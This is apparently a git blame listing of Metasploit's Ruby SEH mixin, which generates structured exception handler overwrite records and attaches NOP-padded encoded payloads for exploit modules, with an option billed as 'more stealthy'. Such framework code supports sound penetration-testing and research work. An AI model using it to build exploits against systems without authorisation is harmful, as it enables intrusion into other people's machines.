2005-09-24 18:02:03 +00:00
|
|
|
require 'rex/exploitation/seh'
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
|
|
|
|
###
|
|
|
|
#
|
|
|
|
# This mixin provides a interface to generating SEH registration records in a
|
|
|
|
# robust fashion using the Rex::Exploitation::Seh class.
|
|
|
|
#
|
|
|
|
###
|
|
|
|
module Exploit::Seh
|
|
|
|
|
2005-11-15 15:11:43 +00:00
|
|
|
#
|
|
|
|
# Creates an instance of an exploit that uses an SEH overwrite.
|
|
|
|
#
|
2005-09-24 18:02:03 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super
|
|
|
|
|
|
|
|
# Register an advanced option that allows users to specify whether or
|
|
|
|
# not a dynamic SEH record should be used.
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
2006-12-19 04:32:07 +00:00
|
|
|
OptBool.new('DynamicSehRecord', [ false, "Generate a dynamic SEH record (more stealthy)", false ])
|
2005-09-24 18:02:03 +00:00
|
|
|
], Msf::Exploit::Seh)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Generates an SEH record with zero or more options. The supported options
|
|
|
|
# are:
|
|
|
|
#
|
|
|
|
# NopGenerator
|
|
|
|
#
|
|
|
|
# The NOP generator instance to use, if any.
|
|
|
|
#
|
|
|
|
# Space
|
|
|
|
#
|
|
|
|
# The amount of room the SEH record generator has to play with for
|
|
|
|
# random padding. This should be derived from the maximum amount of
|
|
|
|
# space available to the exploit for payloads minus the current payload
|
|
|
|
# size.
|
|
|
|
#
|
|
|
|
def generate_seh_record(handler, opts = {})
|
|
|
|
seh = Rex::Exploitation::Seh.new(
|
|
|
|
payload_badchars,
|
2005-09-25 23:55:32 +00:00
|
|
|
opts['Space'] || payload_space,
|
|
|
|
opts['NopGenerator'] || nop_generator)
|
2005-09-24 18:02:03 +00:00
|
|
|
|
|
|
|
# Generate the record
|
2006-12-19 04:32:07 +00:00
|
|
|
seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
|
2005-09-24 18:02:03 +00:00
|
|
|
end
|
2005-11-24 18:30:56 +00:00
|
|
|
|
|
|
|
def generate_seh_payload(handler, opts = {})
|
|
|
|
|
|
|
|
# The boilerplate this replaces always has 8 bytes for seh + addr
|
|
|
|
seh_space = 8 + payload.nop_sled_size
|
|
|
|
|
|
|
|
seh = Rex::Exploitation::Seh.new(
|
|
|
|
payload_badchars,
|
|
|
|
seh_space,
|
|
|
|
opts['NopGenerator'] || nop_generator)
|
|
|
|
|
|
|
|
# Generate the record
|
2006-12-19 04:32:07 +00:00
|
|
|
rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
|
2005-11-24 18:30:56 +00:00
|
|
|
|
|
|
|
# Append the payload, minus the nop sled that we replaced
|
|
|
|
rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length)
|
|
|
|
end
|
2005-09-24 18:02:03 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|